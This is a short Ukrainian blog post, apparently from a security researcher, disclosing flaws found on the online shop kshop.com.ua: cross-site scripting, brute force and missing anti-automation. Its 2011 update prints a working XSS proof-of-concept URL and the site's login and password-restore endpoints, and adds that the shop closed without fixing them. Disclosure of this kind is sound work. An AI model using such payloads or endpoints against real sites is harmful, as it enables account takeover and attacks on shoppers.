Уразливості на kshop.com.ua
23:56 08.09.201122.11.2010
У серпні, 04.08.2010, я знайшов Cross-Site Scripting, Brute Force та Insufficient Anti-automation уразливості на сайті http://kshop.com.ua (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на optik.kiev.ua.
Детальна інформація про уразливості з’явиться пізніше.
08.09.2011
XSS:
http://kshop.com.ua/asearch/%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E.html
Brute Force:
http://kshop.com.ua/login.html
http://kshop.com.ua/inc/login.php?login&login=1&passw=1
Insufficient Anti-automation:
http://kshop.com.ua/login.html
http://kshop.com.ua/inc/login.php?restore&remail=1
Даний сайт зараз не працює. Так і не виправивши уразливості, власники сайта вирішили прикрити свій онлайн магазин.